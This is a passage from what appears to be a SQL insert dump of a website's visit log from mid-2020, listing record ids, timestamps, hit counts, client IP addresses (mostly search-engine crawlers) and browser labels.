66.249.70.72','chrome'),(527786,1596183234,1,1,0,0,'46.201.18.232','chrome'),(527787,1596183695,6,6,0,0,'117.195.67.149','chrome'),(527788,1596183766,1,1,0,0,'207.46.13.139','other'),(527789,1596183813,1,1,0,0,'8.29.198.26','other'),(527790,1596184076,2,2,0,0,'66.249.70.72','chrome'),(527791,1596184161,8,8,0,0,'185.11.82.228','other'),(527792,1596184377,1,1,0,0,'66.249.70.69','chrome'),(527793,1596184758,1,1,0,0,'69.171.251.1','other'),(527794,1596184763,1,1,0,0,'66.249.64.38','chrome'),(527795,1596185240,1,1,0,0,'66.249.70.72','chrome'),(527796,1596185261,1,1,0,0,'178.154.200.222','other'),(527797,1596185552,1,0,1,0,'66.249.70.70',''),(527798,1596187679,3,3,0,0,'91.209.11.236','other'),(527799,1596188036,1,1,0,0,'18.223.33.122','chrome'),(527800,1596188314,12,12,0,0,'203.109.108.82','chrome'),(527801,1596188415,1,1,0,0,'91.196.177.134','chrome'),(527802,1596188416,1,1,0,0,'178.154.200.222','other'),(527803,1596188993,2,2,0,0,'91.209.11.236','other'),(527804,1596189750,1,1,0,0,'66.249.70.72','chrome'),(527805,1596189755,6,6,0,0,'66.249.70.69','chrome'),(527806,1596190379,2,2,0,0,'91.209.11.236','other'),(527807,1596191111,1,1,0,0,'157.55.39.84','other'),(527808,1596191460,1,1,0,0,'91.209.11.236','other'),(527809,1596192438,2,2,0,0,'66.249.70.72','chrome'),(527810,1596192579,1,0,1,0,'66.249.70.70',''),(527811,1596193611,1,1,0,0,'109.74.154.72','chrome'),(527812,1596193840,1,1,0,0,'8.29.198.26','other'),(527813,1596194080,1,1,0,0,'95.78.33.222','chrome'),(527814,1596194083,1,1,0,0,'37.146.115.99','chrome'),(527815,1596194655,1,1,0,0,'8.29.198.27','other'),(527816,1596195548,1,1,0,0,'66.249.70.70','chrome'),(527817,1596195592,1,1,0,0,'213.180.203.16','other'),(527818,1596195947,1,1,0,0,'157.55.39.84','other'),(527819,1596196652,1,1,0,0,'66.249.64.38','chrome'),(527820,1596196968,4,4,0,0,'66.249.70.69','chrome'),(527821,1596196983,1,1,0,0,'66.249.70.70','chrome'),(527822,1596198833,1,1,0,0,'91.196.178.62','chrome'),(527823,1596198839,2,2,0,0,'66.249.70.72','chrome'),(527824,1596198889,2,2,0,0,'66.249.70.70','chrome'),(527825,1596199075,1,1,0,0,'66.249.64.33','chrome'),(527826,1596199155,1,1,0,0,'66.249.70.69','chrome'),(527827,1596199913,1,1,0,0,'188.163.18.149','chrome'),(527828,1596200434,3,3,0,0,'66.249.70.72','chrome'),(527829,1596200666,1,1,0,0,'91.196.178.75','firefox'),(527830,1596200701,1,1,0,0,'66.249.70.69','chrome'),(527831,1596200844,1,1,0,0,'207.46.13.98','other'),(527832,1596201078,1,1,0,0,'213.180.203.122','other'),(527833,1596201360,1,1,0,0,'207.46.13.103','other'),(527834,1596201493,1,1,0,0,'66.249.64.38','chrome'),(527835,1596202280,2,2,0,0,'66.249.70.72','chrome'),(527836,1596203249,1,1,0,0,'66.249.64.38','chrome'),(527837,1596203348,1,1,0,0,'178.95.156.86','chrome'),(527838,1596203374,2,2,0,0,'66.249.70.72','chrome'),(527839,1596204021,2,2,0,0,'66.249.70.69','chrome'),(527840,1596204186,1,1,0,0,'66.249.70.70','chrome'),(527841,1596204392,2,2,0,0,'66.249.70.72','chrome'),(527842,1596204670,1,1,0,0,'8.29.198.27','other'),(527843,1596204899,1,1,0,0,'91.209.11.236','other'),(527844,1596205485,1,1,0,0,'8.29.198.25','other'),(527845,1596205553,1,1,0,0,'46.201.113.100','chrome'),(527846,1596205613,1,1,0,0,'84.17.62.227','msie'),(527847,1596205797,3,3,0,0,'66.249.70.72','chrome'),(527848,1596205957,1,1,0,0,'66.249.70.69','chrome'),(527849,1596205997,1,1,0,0,'66.249.70.70','chrome'),(527850,1596206331,1,1,0,0,'207.46.13.47','other'),(527851,1596206821,1,1,0,0,'207.46.13.98','other'),(527852,1596207216,2,2,0,0,'66.249.70.69','chrome'),(527853,1596207316,2,2,0,0,'66.249.70.70','chrome'),(527854,1596207737,1,1,0,0,'207.46.13.98','other'),(527855,1596207818,2,2,0,0,'66.249.64.38','chrome'),(527856,1596208004,1,1,0,0,'66.249.70.72','chrome'),(527857,1596208219,1,1,0,0,'213.180.203.16','other'),(527858,1596208420,1,1,0,0,'66.249.64.36','chrome'),(527859,1596208460,1,1,0,0,'66.249.64.33','chrome'),(527860,1596209042,4,4,0,0,'66.249.70.69','chrome'),(527861,1596209097,2,2,0,0,'66.249.64.38','chrome'),(527862,1596210161,2,2,0,0,'66.249.70.72','chrome'),(527863,1596210768,3,3,0,0,'66.249.70.70','chrome'),(527864,1596211074,2,2,0,0,'66.249.70.69','chrome'),(527865,1596211168,1,1,0,0,'109.234.34.254','chrome'),(527866,1596211280,1,1,0,0,'157.55.39.132','other'),(527867,1596211847,1,1,0,0,'17.58.99.84','other'),(527868,1596212076,2,2,0,0,'66.249.70.72','chrome'),(527869,1596212132,1,1,0,0,'66.249.70.70','chrome'),(527870,1596212222,1,1,0,0,'66.249.70.69','chrome'),(527871,1596212814,1,1,0,0,'66.249.64.38','chrome'),(527872,1596213166,1,1,0,0,'66.249.70.72','chrome'),(527873,1596214023,2,2,0,0,'66.249.70.69','chrome'),(527874,1596215031,1,1,0,0,'66.249.70.72','chrome'),(527875,1596215082,2,2,0,0,'66.249.70.69','chrome'),(527876,1596215494,2,2,0,0,'8.29.198.25','other'),(527877,1596216256,1,1,0,0,'66.249.64.38','chrome'),(527878,1596216501,1,1,0,0,'157.55.39.84','other'),(527879,1596216576,3,3,0,0,'66.249.70.70','chrome'),(527880,1596216908,1,1,0,0,'66.249.70.72','chrome'),(527881,1596217116,1,1,0,0,'77.74.177.113','chrome'),(527882,1596217124,1,1,0,0,'157.55.39.132','other'),(527883,1596218005,1,1,0,0,'157.55.39.84','other'),(527884,1596218402,1,1,0,0,'66.249.64.33','chrome'),(527885,1596218538,3,3,0,0,'66.249.70.70','chrome'),(527886,1596218909,1,1,0,0,'66.249.64.36','chrome'),(527887,1596219263,1,1,0,0,'157.55.39.84','other'),(527888,1596219747,1,1,0,0,'66.249.64.38','chrome'),(527889,1596220061,1,1,0,0,'91.196.178.84','firefox'),(527890,1596220529,1,1,0,0,'66.249.70.69','chrome'),(527891,1596220700,1,1,0,0,'66.249.70.72','chrome'),(527892,1596220916,2,2,0,0,'66.249.64.38','chrome'),(527893,1596221629,1,1,0,0,'178.154.200.222','other'),(527894,1596221803,4,4,0,0,'66.249.70.72','chrome'),(527895,1596222383,8,8,0,0,'185.11.82.228','other'),(527896,1596222491,1,1,0,0,'66.249.70.70','chrome'),(527897,1596222521,1,1,0,0,'66.249.70.69','chrome'),(527898,1596222580,1,1,0,0,'207.46.13.98','other'),(527899,1596222807,1,1,0,0,'66.249.64.36','chrome'),(527900,1596223009,1,1,0,0,'77.111.247.250','chrome'),(527901,1596223550,8,8,0,0,'185.11.82.228','other'),(527902,1596223636,1,1,0,0,'46.201.113.100','chrome'),(527903,1596224031,1,1,0,0,'66.249.70.70','chrome'),(527904,1596224337,3,3,0,0,'66.249.70.72','chrome'),(527905,1596224402,1,1,0,0,'66.249.70.69','chrome'),(527906,1596224713,8,8,0,0,'185.11.82.228','other'),(527907,1596224744,1,1,0,0,'17.58.99.84','other'),(527908,1596225064,1,1,0,0,'66.249.64.38','chrome'),(527909,1596225458,2,2,0,0,'66.249.70.70','chrome'),(527910,1596225492,1,1,0,0,'66.249.64.36','chrome'),(527911,1596225746,1,1,0,0,'66.249.70.69','chrome'),(527912,1596225763,1,1,0,0,'46.201.113.100','chrome'),(527913,1596225890,8,8,0,0,'185.11.82.228','other'),(527914,1596225956,1,1,0,0,'37.73.142.13','chrome'),(527915,1596226310,2,2,0,0,'66.249.70.72','chrome'),(527916,1596226324,2,2,0,0,'8.29.198.27','other'),(527917,1596226763,1,1,0,0,'66.249.64.38','chrome'),(527918,1596226837,2,2,0,0,'66.249.70.69','chrome'),(527919,1596227132,8,8,0,0,'185.11.82.228','other'),(527920,1596227620,2,2,0,0,'66.249.70.70','chrome'),(527921,1596227668,4,4,0,0,'66.249.70.72','chrome'),(527922,1596227854,2,2,0,0,'66.249.70.69','chrome'),(527923,1596227970,1,1,0,0,'157.55.39.132','other'),(527924,1596228087,1,1,0,0,'66.249.64.36','chrome'),(527925,1596228362,8,8,0,0,'185.11.82.228','other'),(527926,1596228576,2,2,0,0,'178.154.200.222','other'),(527927,1596228769,1,1,0,0,'66.249.64.38','chrome'),(527928,1596229023,2,2,0,0,'66.249.70.72','chrome'),(527929,1596229556,2,1,1,0,'66.249.70.70',''),(527930,1596229729,8,8,0,0,'185.11.82.228','other'),(527931,1596230416,1,1,0,0,'17.58.99.84','other'),(527932,1596230480,1,1,0,0,'213.180.203.60','other'),(527933,1596230577,1,1,0,0,'66.249.70.70','chrome'),(527934,1596230987,1,1,0,0,'173.252.111.12','other'),(527935,1596231078,8,8,0,0,'185.11.82.228','other'),(527936,1596231084,3,3,0,0,'66.249.64.38','chrome'),(527937,1596231631,4,4,0,0,'66.249.70.72','chrome'),(527938,1596231715,3,3,0,0,'66.249.64.33','chrome'),(527939,1596231756,3,3,0,0,'66.249.70.69','chrome'),(527940,1596231845,3,3,0,0,'66.249.70.70','chrome'),(527941,1596232352,8,8,0,0,'185.11.82.228','other'),(527942,1596232446,1,1,0,0,'66.249.64.38','chrome'),(527943,1596232481,4,4,0,0,'109.70.104.23','chrome'),(527944,1596233347,1,1,0,0,'66.249.64.33','chrome'),(527945,1596233619,8,8,0,0,'185.11.82.228','other'),(527946,1596233996,5,5,0,0,'66.249.70.69','chrome'),(527947,1596234064,1,1,0,0,'66.249.64.38','chrome'),(527948,1596234141,4,4,0,0,'66.249.70.72','chrome'),(527949,1596234175,4,4,0,0,'66.249.70.70','chrome'),(527950,1596234243,1,1,0,0,'66.249.64.36','chrome'),(527951,1596234898,1,1,0,0,'66.249.70.69','chrome'),(527952,1596234980,8,8,0,0,'185.11.82.228','other'),(527953,1596235123,1,1,0,0,'37.230.138.119','firefox'),(527954,1596235125,1,1,0,0,'37.230.138.119','other'),(527955,1596235335,1,1,0,0,'157.55.39.84','other'),(527956,1596235929,5,5,0,0,'66.249.70.69','chrome'),(527957,1596236145,2,2,0,0,'66.249.64.38','chrome'),(527958,1596236196,1,1,0,0,'66.249.70.70','chrome'),(527959,1596236317,3,3,0,0,'66.249.70.72','chrome'),(527960,1596236320,1,1,0,0,'157.55.39.132','other'),(527961,1596236369,8,8,0,0,'185.11.82.228','other'),(527962,1596236932,2,2,0,0,'66.249.70.69','chrome'),(527963,1596237144,1,1,0,0,'8.29.198.25','other'),(527964,1596237261,1,1,0,0,'213.180.203.16','other'),(527965,1596237409,1,1,0,0,'66.249.64.36','chrome'),(527966,1596237493,1,1,0,0,'66.249.70.72','chrome'),(527967,1596237742,8,8,0,0,'185.11.82.228','other'),(527968,1596237963,1,1,0,0,'8.29.198.26','other'),(527969,1596238378,1,1,0,0,'66.249.64.38','chrome'),(527970,1596238409,1,0,1,0,'66.249.70.72',''),(527971,1596238973,4,4,0,0,'66.249.70.70','chrome'),(527972,1596239113,8,8,0,0,'185.11.82.228','other'),(527973,1596239209,1,1,0,0,'66.249.64.33','chrome'),(527974,1596239405,4,4,0,0,'66.249.70.69','chrome'),(527975,1596239708,1,1,0,0,'62.205.134.182','other'),(527976,1596239716,2,2,0,0,'66.249.70.72','chrome'),(527977,1596239733,2,2,0,0,'66.249.64.36','chrome'),(527978,1596240054,1,1,0,0,'66.249.70.70','chrome'),(527979,1596240334,3,3,0,0,'66.249.70.69','chrome'),(527980,1596240497,8,8,0,0,'185.11.82.228','other'),(527981,1596240863,1,1,0,0,'66.249.70.72','chrome'),(527982,1596240907,1,1,0,0,'213.180.203.16','other'),(527983,1596240926,1,1,0,0,'157.55.39.84','other'),(527984,1596241834,8,8,0,0,'185.11.82.228','other'),(527985,1596242030,3,3,0,0,'66.249.70.70','chrome'),(527986,1596242071,5,5,0,0,'66.249.70.69','chrome'),(527987,1596242131,2,2,0,0,'66.249.70.72','chrome'),(527988,1596242250,1,1,0,0,'66.249.64.38','chrome'),(527989,1596242270,2,2,0,0,'66.249.64.33','chrome'),(527990,1596243194,8,8,0,0,'185.11.82.228','other'),(527991,1596243839,1,1,0,0,'17.58.99.84','other'),(527992,1596244145,2,2,0,0,'66.249.70.72','chrome'),(527993,1596244300,3,3,0,0,'66.249.70.69','chrome'),(527994,1596244579,8,8,0,0,'185.11.82.228','other'),(527995,1596244851,1,1,0,0,'66.249.70.70','chrome'),(527996,1596246010,8,8,0,0,'185.11.82.228','other'),(527997,1596246493,4,4,0,0,'66.249.70.69','chrome'),(527998,1596246588,1,1,0,0,'66.249.70.72','chrome'),(527999,1596246822,1,1,0,0,'157.55.39.84','other'),(528000,1596247294,2,2,0,0,'66.249.70.70','chrome'),(528001,1596247474,8,8,0,0,'185.11.82.228','other'),(528002,1596247537,1,1,0,0,'66.249.70.72','chrome'),(528003,1596247821,2,2,0,0,'66.249.70.69','chrome'),(528004,1596247966,1,1,0,0,'8.29.198.25','other'),(528005,1596248436,1,1,0,0,'178.154.200.97','other'),(528006,1596248785,1,1,0,0,'8.29.198.27','other'),(528007,1596248877,8,8,0,0,'185.11.82.228','other'),(528008,1596248987,5,5,0,0,'66.249.70.69','chrome'),(528009,1596249054,4,4,0,0,'66.249.70.70','chrome'),(528010,1596249305,3,3,0,0,'157.55.39.96','other'),(528011,1596249409,2,2,0,0,'66.249.70.72','chrome'),(528012,1596249959,1,1,0,0,'157.55.39.132','other'),(528013,1596250357,8,8,0,0,'185.11.82.228','other'),(528014,1596250369,1,1,0,0,'66.249.70.69','chrome'),(528015,1596250490,1,1,0,0,'66.249.64.33','chrome'),(528016,1596251186,2,2,0,0,'66.249.70.70','chrome'),(528017,1596251609,2,2,0,0,'66.249.70.69','chrome'),(528018,1596251828,8,8,0,0,'185.11.82.228','other'),(528019,1596252391,2,2,0,0,'66.249.70.70','chrome'),(528020,1596253128,2,2,0,0,'66.249.64.33','chrome'),(528021,1596253327,1,0,1,0,'66.249.70.72',''),(528022,1596253367,8,8,0,0,'185.11.82.228','other'),(528023,1596253675,2,2,0,0,'66.249.70.72','chrome'),(528024,1596253736,2,2,0,0,'66.249.64.38','chrome'),(528025,1596254476,1,1,0,0,'66.249.64.36','chrome'),(528026,1596254574,2,2,0,0,'66.249.70.69','chrome'),(528027,1596254672,3,3,0,0,'66.249.70.72','chrome'),(528028,1596254682,1,1,0,0,'66.249.70.70','chrome'),(528029,1596254886,8,8,0,0,'185.11.82.228','other'),(528030,1596255125,1,1,0,0,'154.51.131.142','chrome'),(528031,1596255854,3,3,0,0,'66.249.70.72','chrome'),(528032,1596255913,8,8,0,0,'66.249.70.70','chrome'),(528033,1596255942,3,3,0,0,'66.249.70.69','chrome'),(528034,1596255996,1,1,0,0,'131.220.6.152','chrome'),(528035,1596256672,1,1,0,0,'66.249.64.33','chrome'),(528036,1596256817,1,1,0,0,'66.249.70.72','chrome'),(528037,1596256949,1,1,0,0,'66.249.70.70','chrome'),(528038,1596256961,1,1,0,0,'178.154.200.222','other'),(528039,1596257110,1,1,0,0,'95.174.220.112','chrome'),(528040,1596257701,1,1,0,0,'62.205.134.182','other'),(528041,1596258047,3,3,0,0,'66.249.70.72','chrome'),(528042,1596258753,3,3,0,0,'66.249.70.69','chrome'),(528043,1596258793,1,1,0,0,'8.29.198.25','other'),(528044,1596259206,1,1,0,0,'213.180.203.16','other'),(528045,1596259611,1,1,0,0,'8.29.198.26','other'),(528046,1596259703,1,1,0,0,'66.249.64.38','chrome'),(528047,1596260129,1,1,0,0,'178.154.200.222','other'),(528048,1596261034,1,1,0,0,'66.249.70.70','chrome'),(528049,1596261311,1,1,0,0,'84.17.62.227','msie'),(528050,1596261381,8,8,0,0,'185.11.82.228','other'),(528051,1596261544,1,1,0,0,'66.249.70.69','chrome'),(528052,1596261818,1,1,0,0,'66.249.64.36','chrome'),(528053,1596262436,1,1,0,0,'66.249.64.38','chrome'),(528054,1596262578,3,3,0,0,'66.249.70.72','chrome'),(528055,1596263007,3,3,0,0,'66.249.70.70','chrome'),(528056,1596263740,1,1,0,0,'66.249.70.72','chrome'),(528057,1596263770,1,1,0,0,'178.154.200.222','other'),(528058,1596263889,2,2,0,0,'66.249.70.69','chrome'),(528059,1596264397,1,1,0,0,'209.17.96.250','other'),(528060,1596264791,3,3,0,0,'66.249.70.69','chrome'),(528061,1596264818,1,1,0,0,'66.249.64.36','chrome'),(528062,1596264913,2,2,0,0,'66.249.70.72','chrome'),(528063,1596265411,1,1,0,0,'157.55.39.75','other'),(528064,1596265626,2,2,0,0,'66.249.70.70','chrome'),(528065,1596265719,3,3,0,0,'66.249.70.69','chrome'),(528066,1596265916,2,2,0,0,'66.249.64.38','chrome'),(528067,1596266075,1,1,0,0,'66.249.64.33','chrome'),(528068,1596266244,2,2,0,0,'66.249.70.72','chrome'),(528069,1596266848,1,1,0,0,'185.138.228.227','chrome'),(528070,1596267072,2,2,0,0,'66.249.70.70','chrome'),(528071,1596267174,1,1,0,0,'157.55.39.132','other'),(528072,1596267521,3,3,0,0,'66.249.70.72','chrome'),(528073,1596267616,2,2,0,0,'66.249.70.69','chrome'),(528074,1596268004,1,1,0,0,'66.249.64.36','chrome'),(528075,1596268805,5,5,0,0,'66.249.70.69','chrome'),(528076,1596269079,1,1,0,0,'66.249.64.33','chrome'),(528077,1596269190,2,2,0,0,'66.249.70.70','chrome'),(528078,1596269221,1,1,0,0,'66.249.70.72','chrome'),(528079,1596269271,1,1,0,0,'66.249.64.36','chrome'),(528080,1596269545,1,1,0,0,'157.55.39.132','other'),(528081,1596269614,1,1,0,0,'8.29.198.25','other'),(528082,1596269745,33,33,0,0,'13.92.29.115','firefox'),(528083,1596269754,1,1,0,0,'178.154.200.222','other'),(528084,1596269819,1,1,0,0,'13.92.29.115','chrome'),(528085,1596270034,1,1,0,0,'209.17.96.18','other'),(528086,1596270386,8,8,0,0,'185.11.82.228','other'),(528087,1596270433,1,1,0,0,'8.29.198.26','other'),(528088,1596270686,1,1,0,0,'17.58.99.84','other'),(528089,1596271492,2,2,0,0,'66.249.70.72','chrome'),(528090,1596272297,1,1,0,0,'66.249.64.33','chrome'),(528091,1596272586,2,1,1,0,'66.249.70.70',''),(528092,1596273031,1,1,0,0,'207.46.13.98','other'),(528093,1596273164,2,2,0,0,'66.249.70.72','chrome'),(528094,1596274357,2,2,0,0,'66.249.70.70','chrome'),(528095,1596274361,1,0,1,0,'66.249.70.72',''),(528096,1596275004,2,1,1,0,'66.249.70.72',''),(528097,1596275084,1,0,1,0,'66.249.70.69',''),(528098,1596275086,2,2,0,0,'66.249.70.69','chrome'),(528099,1596275667,2,1,1,0,'66.249.70.70',''),(528100,1596275700,2,2,0,0,'66.249.70.70','chrome'),(528101,1596275995,1,1,0,0,'66.249.70.69','chrome'),(528102,1596276552,2,1,1,0,'66.249.70.72',''),(528103,1596277290,1,0,1,0,'66.249.64.36',''),(528104,1596277303,1,1,0,0,'66.249.64.33','chrome'),(528105,1596277316,2,2,0,0,'66.249.70.69','chrome'),(528106,1596277677,2,2,0,0,'66.249.70.72','chrome'),(528107,1596277731,2,2,0,0,'66.249.70.70','chrome'),(528108,1596278498,3,3,0,0,'66.249.70.69','chrome'),(528109,1596278796,1,1,0,0,'66.249.64.36','chrome'),(528110,1596278924,1,1,0,0,'66.249.70.70','chrome'),(528111,1596279078,2,2,0,0,'66.249.70.72','chrome'),(528112,1596279802,1,1,0,0,'109.74.154.72','chrome'),(528113,1596279826,2,2,0,0,'66.249.70.70','chrome'),(528114,1596280123,1,1,0,0,'66.249.64.36','chrome'),(528115,1596280188,4,4,0,0,'66.249.70.72','chrome'),(528116,1596280350,1,1,0,0,'66.249.64.33','chrome'),(528117,1596280441,1,1,0,0,'8.29.198.26','other'),(528118,1596280559,4,4,0,0,'66.249.70.69','chrome'),(528119,1596280745,2,2,0,0,'66.249.70.70','chrome'),(528120,1596281261,1,1,0,0,'8.29.198.27','other'),(528121,1596281407,1,1,0,0,'66.249.70.72','chrome'),(528122,1596282119,1,1,0,0,'157.55.39.132','other'),(528123,1596282124,1,1,0,0,'91.196.178.130','chrome'),(528124,1596282587,2,2,0,0,'66.249.64.36','chrome'),(528125,1596283009,2,2,0,0,'66.249.70.70','chrome'),(528126,1596283022,1,1,0,0,'66.249.64.33','chrome'),(528127,1596283066,1,1,0,0,'66.249.70.72','chrome'),(528128,1596283280,1,1,0,0,'207.46.13.98','other'),(528129,1596283430,1,1,0,0,'37.120.203.74','other'),(528130,1596283837,2,2,0,0,'66.249.70.69','chrome'),(528131,1596284252,2,2,0,0,'66.249.70.72','chrome'),(528132,1596284314,1,1,0,0,'66.249.64.36','chrome'),(528133,1596284391,1,1,0,0,'213.180.203.16','other'),(528134,1596284625,1,1,0,0,'157.55.39.84','other'),(528135,1596284969,2,2,0,0,'66.249.70.70','chrome'),(528136,1596285286,2,2,0,0,'66.249.70.72','chrome'),(528137,1596285381,8,8,0,0,'185.11.82.228','other'),(528138,1596285823,1,1,0,0,'66.249.64.38','chrome'),(528139,1596285980,1,1,0,0,'91.196.178.1','chrome'),(528140,1596286276,2,2,0,0,'66.249.70.69','chrome'),(528141,1596286658,1,1,0,0,'66.249.70.72','chrome'),(528142,1596286661,1,1,0,0,'66.249.70.70','chrome'),(528143,1596287350,1,1,0,0,'17.58.99.84','other'),(528144,1596287722,1,1,0,0,'66.249.64.36','chrome'),(528145,1596288722,3,3,0,0,'66.249.70.69','chrome'),(528146,1596289510,3,3,0,0,'66.249.70.72','chrome'),(528147,1596289703,1,1,0,0,'85.209.44.53','chrome'),(528148,1596290608,2,2,0,0,'66.249.70.72','chrome'),(528149,1596290793,2,2,0,0,'66.249.70.69','chrome'),(528150,1596290806,2,2,0,0,'178.154.200.222','other'),(528151,1596291060,1,1,0,0,'66.249.70.70','chrome'),(528152,1596291265,1,1,0,0,'8.29.198.26','other'),(528153,1596291851,5,5,0,0,'66.249.70.69','chrome'),(528154,1596291950,1,1,0,0,'91.209.11.236','other'),(528155,1596292040,3,3,0,0,'66.249.70.70','chrome'),(528156,1596292093,1,1,0,0,'8.29.198.25','other'),(528157,1596292481,8,8,0,0,'185.11.82.228','other'),(528158,1596292656,3,3,0,0,'91.196.178.161','chrome'),(528159,1596293054,1,1,0,0,'207.46.13.98','other'),(528160,1596293568,8,8,0,0,'185.11.82.228','other'),(528161,1596293865,1,1,0,0,'66.249.64.36','chrome'),(528162,1596293870,1,1,0,0,'178.154.200.222','other'),(528163,1596293902,2,2,0,0,'66.249.70.69','chrome'),(528164,1596294199,1,1,0,0,'66.249.70.72','chrome'),(528165,1596294253,1,1,0,0,'66.249.64.38','chrome'),(528166,1596294644,8,8,0,0,'185.11.82.228','other'),(528167,1596294973,2,2,0,0,'66.249.70.69','chrome'),(528168,1596295317,1,1,0,0,'66.249.70.72','chrome'),(528169,1596295496,1,1,0,0,'178.154.200.222','other'),(528170,1596295530,3,3,0,0,'66.249.70.70','chrome'),(528171,1596295737,8,8,0,0,'185.11.82.228','other'),(528172,1596295845,1,1,0,0,'46.99.20.108','chrome'),(528173,1596296571,4,4,0,0,'66.249.70.70','chrome'),(528174,1596296807,8,8,0,0,'185.11.82.228','other'),(528175,1596296922,5,5,0,0,'66.249.70.69','chrome'),(528176,1596297061,1,1,0,0,'66.249.70.72','chrome'),(528177,1596297480,3,3,0,0,'66.249.70.70','chrome'),(528178,1596297777,1,1,0,0,'66.249.64.33','chrome'),(528179,1596297910,8,8,0,0,'185.11.82.228','other'),(528180,1596298483,1,0,1,0,'66.249.70.72',''),(528181,1596298686,1,1,0,0,'91.196.178.1','chrome'),(528182,1596298926,3,3,0,0,'66.249.70.72','chrome'),(528183,1596299021,8,8,0,0,'185.11.82.228','other'),(528184,1596299061,6,6,0,0,'66.249.70.69','chrome'),(528185,1596299220,3,3,0,0,'66.249.70.70','chrome'),(528186,1596299504,1,1,0,0,'66.249.64.38','chrome'),(528187,1596300135,8,8,0,0,'185.11.82.228','other'),(528188,1596300183,1,1,0,0,'66.249.70.70','chrome'),(528189,1596300413,3,3,0,0,'66.249.70.72','chrome'),(528190,1596301021,2,2,0,0,'66.249.64.38','chrome'),(528191,1596301024,3,3,0,0,'66.249.70.69','chrome'),(528192,1596301296,8,8,0,0,'185.11.82.228','other'),(528193,1596301332,2,2,0,0,'66.249.70.72','chrome'),(528194,1596301666,1,1,0,0,'66.249.70.70','chrome'),(528195,1596301913,1,1,0,0,'66.249.64.33','chrome'),(528196,1596302024,2,2,0,0,'66.249.70.69','chrome'),(528197,1596302087,1,1,0,0,'8.29.198.27','other'),(528198,1596302247,1,1,0,0,'66.249.70.72','chrome'),(528199,1596302454,8,8,0,0,'185.11.82.228','other'),(528200,1596302896,2,2,0,0,'66.249.64.36','chrome'),(528201,1596302924,1,1,0,0,'8.29.198.25','other'),(528202,1596303045,2,2,0,0,'66.249.64.33','chrome'),(528203,1596303193,1,1,0,0,'66.249.70.69','chrome'),(528204,1596303213,1,1,0,0,'66.249.70.70','chrome'),(528205,1596303546,8,8,0,0,'185.11.82.228','other'),(528206,1596303981,2,2,0,0,'66.249.70.72','chrome'),(528207,1596304391,1,1,0,0,'157.55.39.84','other'),(528208,1596304636,1,1,0,0,'66.249.64.33','chrome'),(528209,1596304686,8,8,0,0,'185.11.82.228','other'),(528210,1596304893,2,2,0,0,'66.249.70.69','chrome'),(528211,1596304926,1,1,0,0,'66.249.70.72','chrome'),(528212,1596305423,4,4,0,0,'66.249.70.70','chrome'),(528213,1596305822,1,1,0,0,'66.249.64.36','chrome'),(528214,1596305832,8,8,0,0,'185.11.82.228','other'),(528215,1596306085,3,3,0,0,'66.249.70.72','chrome'),(528216,1596306342,3,3,0,0,'66.249.70.69','chrome'),(528217,1596307012,8,8,0,0,'185.11.82.228','other'),(528218,1596307035,1,1,0,0,'66.249.64.33','chrome'),(528219,1596307748,3,3,0,0,'66.249.70.69','chrome'),(528220,1596308001,1,1,0,0,'66.249.64.33','chrome'),(528221,1596308028,1,1,0,0,'66.249.64.36','chrome'),(528222,1596308199,8,8,0,0,'185.11.82.228','other'),(528223,1596308203,2,2,0,0,'66.249.70.72','chrome'),(528224,1596308609,1,1,0,0,'66.249.64.38','chrome'),(528225,1596308736,1,1,0,0,'196.18.15.97','other'),(528226,1596308863,1,1,0,0,'66.249.70.70','chrome'),(528227,1596309584,8,8,0,0,'185.11.82.228','other'),(528228,1596310333,4,4,0,0,'66.249.70.70','chrome'),(528229,1596310366,2,2,0,0,'66.249.70.69','chrome'),(528230,1596310796,1,1,0,0,'66.249.64.36','chrome'),(528231,1596310836,8,8,0,0,'185.11.82.228','other'),(528232,1596311245,2,2,0,0,'66.249.70.72','chrome'),(528233,1596311353,4,4,0,0,'66.249.70.69','chrome'),(528234,1596311464,3,3,0,0,'66.249.70.70','chrome'),(528235,1596312018,1,1,0,0,'157.55.39.132','other'),(528236,1596312049,8,8,0,0,'185.11.82.228','other'),(528237,1596312488,1,1,0,0,'66.249.70.69','chrome'),(528238,1596312522,1,1,0,0,'66.249.70.70','chrome'),(528239,1596312556,1,1,0,0,'75.101.244.108','other'),(528240,1596312913,1,1,0,0,'8.29.198.27','other'),(528241,1596313248,3,3,0,0,'66.249.70.72','chrome'),(528242,1596313298,8,8,0,0,'185.11.82.228','other'),(528243,1596313502,2,2,0,0,'66.249.64.33','chrome'),(528244,1596313613,1,1,0,0,'66.249.70.69','chrome'),(528245,1596313731,3,3,0,0,'66.249.70.70','chrome'),(528246,1596313846,1,1,0,0,'66.249.64.38','chrome'),(528247,1596314572,8,8,0,0,'185.11.82.228','other'),(528248,1596314813,1,1,0,0,'66.249.64.36','chrome'),(528249,1596314884,1,1,0,0,'157.55.39.132','other'),(528250,1596315347,1,1,0,0,'66.249.70.69','chrome'),(528251,1596315590,1,1,0,0,'66.249.70.70','chrome'),(528252,1596315855,8,8,0,0,'185.11.82.228','other'),(528253,1596316576,1,1,0,0,'66.249.70.70','chrome'),(528254,1596317162,8,8,0,0,'185.11.82.228','other'),(528255,1596318517,8,8,0,0,'185.11.82.228','other'),(528256,1596318668,1,1,0,0,'66.249.70.70','chrome'),(528257,1596319902,8,8,0,0,'185.11.82.228','other'),(528258,1596320974,1,1,0,0,'213.180.203.101','other'),(528259,1596321369,8,8,0,0,'185.11.82.228','other'),(528260,1596321817,1,1,0,0,'66.249.70.69','chrome'),(528261,1596322022,1,1,0,0,'46.99.3.8','chrome'),(528262,1596322748,8,8,0,0,'185.11.82.228','other'),(528263,1596322800,2,2,0,0,'66.249.70.69','chrome'),(528264,1596322830,2,2,0,0,'66.249.70.70','chrome'),(528265,1596323023,1,1,0,0,'66.249.64.38','chrome'),(528266,1596323737,1,1,0,0,'8.29.198.25','other'),(528267,1596323952,1,1,0,0,'66.249.64.33','chrome'),(528268,1596324228,8,8,0,0,'185.11.82.228','other'),(528269,1596324523,3,3,0,0,'66.249.70.70','chrome'),(528270,1596324601,2,2,0,0,'66.249.70.72','chrome'),(528271,1596324810,1,1,0,0,'66.249.64.38','chrome'),(528272,1596324827,1,1,0,0,'66.249.70.69','chrome'),(528273,1596325758,1,1,0,0,'3.23.113.238','chrome'),(528274,1596325796,8,8,0,0,'185.11.82.228','other'),(528275,1596326107,1,1,0,0,'62.205.134.182','other'),(528276,1596326209,3,3,0,0,'66.249.70.69','chrome'),(528277,1596327273,2,2,0,0,'66.249.70.72','chrome'),(528278,1596327338,8,8,0,0,'185.11.82.228','other'),(528279,1596327740,1,1,0,0,'66.249.64.38','chrome'),(528280,1596328094,2,2,0,0,'66.249.64.36','ch